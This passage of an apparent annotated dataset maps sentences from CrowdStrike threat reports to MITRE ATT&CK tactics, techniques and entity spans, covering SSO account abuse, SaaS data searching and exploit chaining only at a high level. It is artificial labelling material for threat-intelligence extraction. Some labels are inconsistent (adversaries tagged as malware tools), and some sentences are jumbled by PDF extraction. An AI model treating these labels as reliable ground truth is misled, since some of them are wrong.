"procedure": "SCATTER used compromised SSO accounts to access SaaS applications", "entities": [ { "text": "SCATTERED SPIDER", "start": 2, "end": 18, "label": "ThreatActor" }, { "text": "has leveraged", "start": 19, "end": 32, "label": "Action" }, { "text": "to access", "start": 58, "end": 67, "label": "Action" }, { "text": "SSO accounts", "start": 45, "end": 57, "label": "Infrastructure_Indicator" }, { "text": "SaaS applications", "start": 95, "end": 112, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-48_crowdstrike_report-p9-s60-7f145d", "source": "crowdstrike", "doc_id": "48_crowdstrike_report", "page_number": 9, "sentence_id": 60, "context_before": "• SCATTERED SPIDER has leveraged compromised SSO accounts to access a wide range of integrated SaaS applications, including chat, customer relationship management, credential management, document storage, productivity, and security tools.", "sentence_text": "• In many intrusions, adversaries searched SaaS applications for the following information: 1) account credentials and network architecture documentation to conduct lateral movement and 2) cyber insurance and revenue data to inform extortion demands.", "relevant": "yes", "tactic": [ { "id": "TA0008", "name": "Lateral Movement" }, { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1213", "name": "Data from Information Repositories" } ], "procedure": "adversaries searched SaaS apps for account credentials and network architecture docs", "entities": [ { "text": "adversaries ", "start": 22, "end": 34, "label": "MalwareTool" }, { "text": "searched ", "start": 34, "end": 43, "label": "Action" }, { "text": "SaaS applications", "start": 43, "end": 60, "label": "Infrastructure_Indicator" }, { "text": "account credentials", "start": 95, "end": 114, "label": "Infrastructure_Indicator" }, { "text": "network architecture documentation", "start": 119, "end": 153, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-48_crowdstrike_report-p10-s61-91ea09", "source": "crowdstrike", "doc_id": "48_crowdstrike_report", "page_number": 10, "sentence_id": 61, "context_before": "• In many intrusions, adversaries searched SaaS applications for the following information: 1) account credentials and network architecture documentation to conduct lateral movement and 2) cyber insurance and revenue data to inform extortion demands.", "sentence_text": "Social engineering proliferated throughout 2024 as adversaries explored new initial access methods to bypass security defenses.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-48_crowdstrike_report-p10-s62-5b78bb", "source": "crowdstrike", "doc_id": "48_crowdstrike_report", "page_number": 10, "sentence_id": 62, "context_before": "Social engineering proliferated throughout 2024 as adversaries explored new initial access methods to bypass security defenses.", "sentence_text": "GenAI became a key adversary tool, especially in support of social engineering campaigns and high-tempo intelligence operations (IO) campaigns.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-48_crowdstrike_report-p10-s63-de88e4", "source": "crowdstrike", "doc_id": "48_crowdstrike_report", "page_number": 10, "sentence_id": 63, "context_before": "GenAI became a key adversary tool, especially in support of social engineering campaigns and high-tempo intelligence operations (IO) campaigns.", "sentence_text": "Targeted eCrime adversaries remain a persistent threat to specific sectors.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-48_crowdstrike_report-p10-s64-e82308", "source": "crowdstrike", "doc_id": "48_crowdstrike_report", "page_number": 10, "sentence_id": 64, "context_before": "Targeted eCrime adversaries remain a persistent threat to specific sectors.", "sentence_text": "Targeted intrusion adversaries were active and innovative in 2024, adapting their tactics to achieve geopolitical and strategic goals while evading improved defenses.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-48_crowdstrike_report-p10-s65-ea38c2", "source": "crowdstrike", "doc_id": "48_crowdstrike_report", "page_number": 10, "sentence_id": 65, "context_before": "Targeted intrusion adversaries were active and innovative in 2024, adapting their tactics to achieve geopolitical and strategic goals while evading improved defenses.", "sentence_text": "Russia-nexus adversaries are expected to continue their aggressive pursuit of victory in Ukraine, focusing on intelligence collection operations targeting Ukraine and NATO members.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-48_crowdstrike_report-p10-s66-84774c", "source": "crowdstrike", "doc_id": "48_crowdstrike_report", "page_number": 10, "sentence_id": 66, "context_before": "Russia-nexus adversaries are expected to continue their aggressive pursuit of victory in Ukraine, focusing on intelligence collection operations targeting Ukraine and NATO members.", "sentence_text": "The vulnerability exploitation landscape remains a critical concern.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-48_crowdstrike_report-p10-s67-9e9681", "source": "crowdstrike", "doc_id": "48_crowdstrike_report", "page_number": 10, "sentence_id": 67, "context_before": "The vulnerability exploitation landscape remains a critical concern.", "sentence_text": "Threat actors are expected to continue aggressively targeting devices at the network periphery, particularly network appliances.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-48_crowdstrike_report-p10-s68-f1e812", "source": "crowdstrike", "doc_id": "48_crowdstrike_report", "page_number": 10, "sentence_id": 68, "context_before": "Threat actors are expected to continue aggressively targeting devices at the network periphery, particularly network appliances.", "sentence_text": "SaaS applications are also in the crosshairs.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-48_crowdstrike_report-p10-s69-031a52", "source": "crowdstrike", "doc_id": "48_crowdstrike_report", "page_number": 10, "sentence_id": 69, "context_before": "SaaS applications are also in the crosshairs.", "sentence_text": "After observing eCrime and targeted intrusion adversaries use access to cloud-based SaaS applications to obtain data for lateral movement, extortion, and third-party targeting in 2024, CrowdStrike anticipates SaaS exploitation will be a threat to watch in 2025.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-48_crowdstrike_report-p10-s70-c1d680", "source": "crowdstrike", "doc_id": "48_crowdstrike_report", "page_number": 10, "sentence_id": 70, "context_before": "After observing eCrime and targeted intrusion adversaries use access to cloud-based SaaS applications to obtain data for lateral movement, extortion, and third-party targeting in 2024, CrowdStrike anticipates SaaS exploitation will be a threat to watch in 2025.", "sentence_text": "Throughout 2024, the enterprising adversary expanded the maturity and sophistication of their operations across sectors and geographies.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-48_crowdstrike_report-p11-s71-12056e", "source": "crowdstrike", "doc_id": "48_crowdstrike_report", "page_number": 11, "sentence_id": 71, "context_before": "Throughout 2024, the enterprising adversary expanded the maturity and sophistication of their operations across sectors and geographies.", "sentence_text": "Organizations should adopt phishing-resistant MFA solutions, such as hardware security keys, to prevent unauthorized access.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-48_crowdstrike_report-p11-s72-d568a7", "source": "crowdstrike", "doc_id": "48_crowdstrike_report", "page_number": 11, "sentence_id": 72, "context_before": "Organizations should adopt phishing-resistant MFA solutions, such as hardware security keys, to prevent unauthorized access.", "sentence_text": "Identity threat detection tools must monitor behavior across endpoints and on-premises, cloud, and SaaS environments to flag privilege escalation, unauthorized access, or backdoor account creation.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-48_crowdstrike_report-p11-s73-af0148", "source": "crowdstrike", "doc_id": "48_crowdstrike_report", "page_number": 11, "sentence_id": 73, "context_before": "Identity threat detection tools must monitor behavior across endpoints and on-premises, cloud, and SaaS environments to flag privilege escalation, unauthorized access, or backdoor account creation.", "sentence_text": "Integrating these tools with extended detection and response (XDR) platforms ensures comprehensive visibility and a unified defense against adversaries.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-48_crowdstrike_report-p11-s74-b3c53c", "source": "crowdstrike", "doc_id": "48_crowdstrike_report", "page_number": 11, "sentence_id": 74, "context_before": "Integrating these tools with extended detection and response (XDR) platforms ensures comprehensive visibility and a unified defense against adversaries.", "sentence_text": "Additionally, organizations should educate users to recognize vishing and phishing attempts while maintaining proactive monitoring to detect and respond to identity-based threats.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-48_crowdstrike_report-p11-s75-2451b9", "source": "crowdstrike", "doc_id": "48_crowdstrike_report", "page_number": 11, "sentence_id": 75, "context_before": "Additionally, organizations should educate users to recognize vishing and phishing attempts while maintaining proactive monitoring to detect and respond to identity-based threats.", "sentence_text": "Eliminate cross-domain visibility gaps Adversaries’ growing use of hands-on-keyboard techniques and legitimate tools makes detection and response more difficult.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-48_crowdstrike_report-p11-s76-7d9f27", "source": "crowdstrike", "doc_id": "48_crowdstrike_report", "page_number": 11, "sentence_id": 76, "context_before": "Eliminate cross-domain visibility gaps Adversaries’ growing use of hands-on-keyboard techniques and legitimate tools makes detection and response more difficult.", "sentence_text": "Unlike traditional malware, these methods allow attackers to bypass traditional security measures by executing commands and using legitimate software to mimic normal operations.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" }, { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1059.003", "name": "Windows Command Shell" }, { "id": "T1036.004", "name": "Masquerade Task or Service" } ], "procedure": "attackers execute commands and use legitimate software", "entities": [ { "text": "attackers ", "start": 48, "end": 58, "label": "ThreatActor" }, { "text": "bypass traditional security", "start": 61, "end": 88, "label": "Action" }, { "text": "executing commands", "start": 101, "end": 119, "label": "Action" }, { "text": "using legitimate software", "start": 124, "end": 149, "label": "Action" } ] }, { "uid": "crowdstrike-48_crowdstrike_report-p11-s77-27259f", "source": "crowdstrike", "doc_id": "48_crowdstrike_report", "page_number": 11, "sentence_id": 77, "context_before": "Unlike traditional malware, these methods allow attackers to bypass traditional security measures by executing commands and using legitimate software to mimic normal operations.", "sentence_text": "To counter this, organizations must modernize their detection and response strategies.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-48_crowdstrike_report-p11-s78-d18ade", "source": "crowdstrike", "doc_id": "48_crowdstrike_report", "page_number": 11, "sentence_id": 78, "context_before": "To counter this, organizations must modernize their detection and response strategies.", "sentence_text": "Defend the cloud as core infrastructure Cloud-focused adversaries are exploiting misconfigurations, stolen credentials, and cloud management tools to infiltrate systems, move laterally, and maintain persistent access for malicious activities like data theft and ransomware deployment.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-48_crowdstrike_report-p11-s79-d76062", "source": "crowdstrike", "doc_id": "48_crowdstrike_report", "page_number": 11, "sentence_id": 79, "context_before": "Defend the cloud as core infrastructure Cloud-focused adversaries are exploiting misconfigurations, stolen credentials, and cloud management tools to infiltrate systems, move laterally, and maintain persistent access for malicious activities like data theft and ransomware deployment.", "sentence_text": "Cloud-native application protection platforms (CNAPPs) with cloud detection and response (CDR) capabilities are critical to counter these threats.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-48_crowdstrike_report-p12-s80-14eb1c", "source": "crowdstrike", "doc_id": "48_crowdstrike_report", "page_number": 12, "sentence_id": 80, "context_before": "Cloud-native application protection platforms (CNAPPs) with cloud detection and response (CDR) capabilities are critical to counter these threats.", "sentence_text": "Regular audits are also critical to maintaining security.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-48_crowdstrike_report-p12-s81-0dbbea", "source": "crowdstrike", "doc_id": "48_crowdstrike_report", "page_number": 12, "sentence_id": 81, "context_before": "Regular audits are also critical to maintaining security.", "sentence_text": "Frequent reviews of cloud environments ensure unused permissions and outdated configurations are addressed promptly.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-48_crowdstrike_report-p12-s82-11c258", "source": "crowdstrike", "doc_id": "48_crowdstrike_report", "page_number": 12, "sentence_id": 82, "context_before": "Frequent reviews of cloud environments ensure unused permissions and outdated configurations are addressed promptly.", "sentence_text": "Prioritize vulnerabilities with an adversary-centric approach Adversaries are increasingly exploiting publicly disclosed vulnerabilities and using exploit chaining, combining multiple vulnerabilities to gain rapid access, escalate privileges, and bypass defenses.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "adversaries exploit publicly disclosed vulnerabilities", "entities": [ { "text": "exploiting publicly disclosed vulnerabilities", "start": 91, "end": 136, "label": "Action" }, { "text": "using exploit chaining", "start": 141, "end": 163, "label": "Action" }, { "text": "Adversaries ", "start": 62, "end": 74, "label": "MalwareTool" } ] }, { "uid": "crowdstrike-48_crowdstrike_report-p12-s83-f8f60c", "source": "crowdstrike", "doc_id": "48_crowdstrike_report", "page_number": 12, "sentence_id": 83, "context_before": "Prioritize vulnerabilities with an adversary-centric approach Adversaries are increasingly exploiting publicly disclosed vulnerabilities and using exploit chaining, combining multiple vulnerabilities to gain rapid access, escalate privileges, and bypass defenses.", "sentence_text": "These multi-stage attacks often rely on public resources like POC exploits and technical blogs, enabling adversaries to craft effective and hard-to-detect payloads.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1588.002", "name": "Tool" } ], "procedure": "POCs enable adversaries to craft hard to detect payloads", "entities": [ { "text": "craft effective and hard-to-detect payloads", "start": 120, "end": 163, "label": "Action" }, { "text": "adversaries ", "start": 105, "end": 117, "label": "MalwareTool" } ] }, { "uid": "crowdstrike-48_crowdstrike_report-p12-s84-60cc55", "source": "crowdstrike", "doc_id": "48_crowdstrike_report", "page_number": 12, "sentence_id": 84, "context_before": "These multi-stage attacks often rely on public resources like POC exploits and technical blogs, enabling adversaries to craft effective and hard-to-detect payloads.", "sentence_text": "Monitoring for subtle signs of exploit chaining, such as unexpected crashes or privilege escalation attempts, can help detect attacks before they progress.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-48_crowdstrike_report-p12-s85-c27406", "source": "crowdstrike", "doc_id": "48_crowdstrike_report", "page_number": 12, "sentence_id": 85, "context_before": "Monitoring for subtle signs of exploit chaining, such as unexpected crashes or privilege escalation attempts, can help detect attacks before they progress.", "sentence_text": "Know your adversary and be prepared When a cyberattack unfolds in minutes — or even seconds — being prepared can be the difference between containment and catastrophe.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-48_crowdstrike_report-p12-s86-1de0d2", "source": "crowdstrike", "doc_id": "48_crowdstrike_report", "page_number": 12, "sentence_id": 86, "context_before": "Know your adversary and be prepared When a cyberattack unfolds in minutes — or even seconds — being prepared can be the difference between containment and catastrophe.", "sentence_text": "Though technology is critical to detect and stop intrusions, the end user remains a crucial link in the chain to stop breaches.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-48_crowdstrike_report-p12-s87-e6f8ce", "source": "crowdstrike", "doc_id": "48_crowdstrike_report", "page_number": 12, "sentence_id": 87, "context_before": "Though technology is critical to detect and stop intrusions, the end user remains a crucial link in the chain to stop breaches.", "sentence_text": "Organizations should initiate user awareness programs to combat the continued threat of phishing and related social engineering techniques.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-48_crowdstrike_report-p12-s88-3dc1dc", "source": "crowdstrike", "doc_id": "48_crowdstrike_report", "page_number": 12, "sentence_id": 88, "context_before": "Organizations should initiate user awareness programs to combat the continued threat of phishing and related social engineering techniques.", "sentence_text": "For security teams, practice makes perfect.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-48_crowdstrike_report-p12-s89-86000a", "source": "crowdstrike", "doc_id": "48_crowdstrike_report", "page_number": 12, "sentence_id": 89, "context_before": "For security teams, practice makes perfect.", "sentence_text": "Encourage an environment that routinely performs tabletop exercises and red/blue teaming to identify gaps and eliminate weaknesses in your cybersecurity practices and response.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-48_crowdstrike_report-p13-s90-cbbabf", "source": "crowdstrike", "doc_id": "48_crowdstrike_report", "page_number": 13, "sentence_id": 90, "context_before": "Encourage an environment that routinely performs tabletop exercises and red/blue teaming to identify gaps and eliminate weaknesses in your cybersecurity practices and response.", "sentence_text": "EXECUTIVE SUMMARY\nDownloadDownload\nthethe FullFull ReportReport", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-48_crowdstrike_report-p13-s91-f5638d", "source": "crowdstrike", "doc_id": "48_crowdstrike_report", "page_number": 13, "sentence_id": 91, "context_before": "EXECUTIVE SUMMARY\nDownloadDownload\nthethe FullFull ReportReport", "sentence_text": "The CrowdStrike 2025 Global Threat Report presents a comprehensive analysis of the most significant trends and events in cyber threat activity in 2024.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-48_crowdstrike_report-p13-s92-ce20e0", "source": "crowdstrike", "doc_id": "48_crowdstrike_report", "page_number": 13, "sentence_id": 92, "context_before": "The CrowdStrike 2025 Global Threat Report presents a comprehensive analysis of the most significant trends and events in cyber threat activity in 2024.", "sentence_text": "Download a free copy of the report at About modern security with the world’s most advanced cloud-native platform for protecting critical areas of enterprise risk — endpoints and cloud workloads, identity and data.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-48_crowdstrike_report-p13-s93-6b017b", "source": "crowdstrike", "doc_id": "48_crowdstrike_report", "page_number": 13, "sentence_id": 93, "context_before": "Download a free copy of the report at About modern security with the world’s most advanced cloud-native platform for protecting critical areas of enterprise risk — endpoints and cloud workloads, identity and data.", "sentence_text": "Learn more: www.crowdstrike.com Follow us: Blog | X | LinkedIn", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-48_crowdstrike_report-p13-s94-126800", "source": "crowdstrike", "doc_id": "48_crowdstrike_report", "page_number": 13, "sentence_id": 94, "context_before": "Learn more: www.crowdstrike.com Follow us: Blog | X | LinkedIn", "sentence_text": "| YouTube Start a free trial today: www.crowdstrike.com/free-trial-guide", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p1-s1-e8c16f", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 1, "sentence_id": 1, "context_before": "", "sentence_text": "NOWHERE TO HIDE", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p2-s2-3783f2", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 2, "sentence_id": 2, "context_before": "NOWHERE TO HIDE", "sentence_text": "NOWHERE TO HIDE 2 Foreword Nearly 12 years ago, a scrappy group of technologists and security professionals came together with a simple idea: building world-class, cloud-delivered endpoint protection that leverages machine learning and artificial intelligence to create a highly dynamic security solution that continues to learn and evolve as endpoints are added and leverages automation to scale.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p2-s3-76b888", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 2, "sentence_id": 3, "context_before": "NOWHERE TO HIDE 2 Foreword Nearly 12 years ago, a scrappy group of technologists and security professionals came together with a simple idea: building world-class, cloud-delivered endpoint protection that leverages machine learning and artificial intelligence to create a highly dynamic security solution that continues to learn and evolve as endpoints are added and leverages automation to scale.", "sentence_text": "But the product was only part of the story.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p2-s4-97a6cf", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 2, "sentence_id": 4, "context_before": "But the product was only part of the story.", "sentence_text": "This technology would be continuously augmented by professional, efficient incident responders who could transform their front-line insights into tangible data to feed it.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p2-s5-85ec3d", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 2, "sentence_id": 5, "context_before": "This technology would be continuously augmented by professional, efficient incident responders who could transform their front-line insights into tangible data to feed it.", "sentence_text": "Key to this message is stopping the breaches perpetrated by these adversaries.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p2-s6-5f80e6", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 2, "sentence_id": 6, "context_before": "Key to this message is stopping the breaches perpetrated by these adversaries.", "sentence_text": "In the time since, CrowdStrike has continuously innovated.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p2-s7-e36efd", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 2, "sentence_id": 7, "context_before": "In the time since, CrowdStrike has continuously innovated.", "sentence_text": "We fulfilled our promise to deliver government-quality intelligence for the private sector and created an elite threat hunting team known as CrowdStrike® Falcon OverWatch™.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p2-s8-8b3c2c", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 2, "sentence_id": 8, "context_before": "We fulfilled our promise to deliver government-quality intelligence for the private sector and created an elite threat hunting team known as CrowdStrike® Falcon OverWatch™.", "sentence_text": "When we talk about creating a security — and continue to do so solution for the way the threat landscape looks today, we cannot ignore every day.\nadversary speed.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p2-s9-ab68e8", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 2, "sentence_id": 9, "context_before": "When we talk about creating a security — and continue to do so solution for the way the threat landscape looks today, we cannot ignore every day.\nadversary speed.", "sentence_text": "Over the past 12 months, the average breakout time for interactive eCrime intrusion activity was 79 minutes.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p2-s10-098eff", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 2, "sentence_id": 10, "context_before": "Over the past 12 months, the average breakout time for interactive eCrime intrusion activity was 79 minutes.", "sentence_text": "Falcon OverWatch witnessed one adversary breakout time of just seven minutes.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p2-s11-f7b5e9", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 2, "sentence_id": 11, "context_before": "Falcon OverWatch witnessed one adversary breakout time of just seven minutes.", "sentence_text": "In less than the time it takes to step away from your desk and make a cup of coffee, this adversary had landed on an initial host and moved laterally into the broader victim environment.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p2-s12-6ecb19", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 2, "sentence_id": 12, "context_before": "In less than the time it takes to step away from your desk and make a cup of coffee, this adversary had landed on an initial host and moved laterally into the broader victim environment.", "sentence_text": "Can we detect an adversary in seven minutes or even seven hours?”", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p2-s13-6b9ab7", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 2, "sentence_id": 13, "context_before": "Can we detect an adversary in seven minutes or even seven hours?”", "sentence_text": "At CrowdStrike, we asked ourselves these questions.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p2-s14-c7df2b", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 2, "sentence_id": 14, "context_before": "At CrowdStrike, we asked ourselves these questions.", "sentence_text": "We came together to figure out how to get even faster at stopping breaches so our customers can go faster.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p2-s15-3d84e2", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 2, "sentence_id": 15, "context_before": "We came together to figure out how to get even faster at stopping breaches so our customers can go faster.", "sentence_text": "We determined that closer alignment of threat hunting and intelligence would not only help us get faster but allow us to come back to the premise we started with: raising the cost to the adversary.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p3-s16-34265a", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 3, "sentence_id": 16, "context_before": "We determined that closer alignment of threat hunting and intelligence would not only help us get faster but allow us to come back to the premise we started with: raising the cost to the adversary.", "sentence_text": "NOWHERE TO HIDE 3 With the release of the CrowdStrike 2023 Threat Hunting Report, we are announcing the formation of a new defensive unit: CrowdStrike Counter Adversary Operations.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p3-s17-953aef", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 3, "sentence_id": 17, "context_before": "NOWHERE TO HIDE 3 With the release of the CrowdStrike 2023 Threat Hunting Report, we are announcing the formation of a new defensive unit: CrowdStrike Counter Adversary Operations.", "sentence_text": "Its mission is to use the collaborative power of hunting and intelligence to raise the cost of doing business for threat actors and give the adversary nowhere to hide.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p3-s18-cf20e4", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 3, "sentence_id": 18, "context_before": "Its mission is to use the collaborative power of hunting and intelligence to raise the cost of doing business for threat actors and give the adversary nowhere to hide.", "sentence_text": "This report is the first of many publications that readers can expect from formally unites Falcon OverWatch and CrowdStrike Intelligence under a single umbrella, deepening the already well-established collaboration between these teams.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p3-s19-33d55f", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 3, "sentence_id": 19, "context_before": "This report is the first of many publications that readers can expect from formally unites Falcon OverWatch and CrowdStrike Intelligence under a single umbrella, deepening the already well-established collaboration between these teams.", "sentence_text": "This year’s report is the culmination of the past 12 months of proactive, intelligence-informed threat hunting.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p3-s20-2c25ee", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 3, "sentence_id": 20, "context_before": "This year’s report is the culmination of the past 12 months of proactive, intelligence-informed threat hunting.", "sentence_text": "In this 12-month period, Falcon OverWatch threat hunters:\n¼ Directly identified approximately one potential intrusion every seven One potential intrusion minutes.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p3-s21-368005", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 3, "sentence_id": 21, "context_before": "In this 12-month period, Falcon OverWatch threat hunters:\n¼ Directly identified approximately one potential intrusion every seven One potential intrusion minutes.", "sentence_text": "Over the course of a year, this adds up to tens of thousands of approximately every instances where human-driven hunting was instrumental in uncovering seven minutes adversaries actively seeking to evade autonomous detection methods.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p3-s22-03e7f0", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 3, "sentence_id": 22, "context_before": "Over the course of a year, this adds up to tens of thousands of approximately every instances where human-driven hunting was instrumental in uncovering seven minutes adversaries actively seeking to evade autonomous detection methods.", "sentence_text": "¼ Distilled their findings into the development of hundreds of new behavioral-based preventions.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p3-s23-029756", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 3, "sentence_id": 23, "context_before": "¼ Distilled their findings into the development of hundreds of new behavioral-based preventions.", "sentence_text": "Over the course of the past year alone, these new platform behavioral-based detections have enabled the Falcon platform to prevent an additional 1.5 million malicious events that would have otherwise evaded autonomous detection methods.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p3-s24-35115e", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 3, "sentence_id": 24, "context_before": "Over the course of the past year alone, these new platform behavioral-based detections have enabled the Falcon platform to prevent an additional 1.5 million malicious events that would have otherwise evaded autonomous detection methods.", "sentence_text": "These figures represent the Falcon OverWatch team’s around-the-clock efforts to disrupt the adversary.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p3-s25-f7b055", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 3, "sentence_id": 25, "context_before": "These figures represent the Falcon OverWatch team’s around-the-clock efforts to disrupt the adversary.", "sentence_text": "This work forces the adversary to change their approaches and directly raises their costs of operating.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p3-s26-4fe857", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 3, "sentence_id": 26, "context_before": "This work forces the adversary to change their approaches and directly raises their costs of operating.", "sentence_text": "Across all malicious activity tracked by CrowdStrike, 71% of intrusions were malware-free.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-49_crowdstrike_report-p3-s27-0ce1b7", "source": "crowdstrike", "doc_id": "49_crowdstrike_report", "page_number": 3, "sentence_id": 27, "context_before": "Across all malicious activity tracked by CrowdStrike, 71% of intrusions were malware-free.", "sentence_text": "In a time when adversaries increasingly rely on 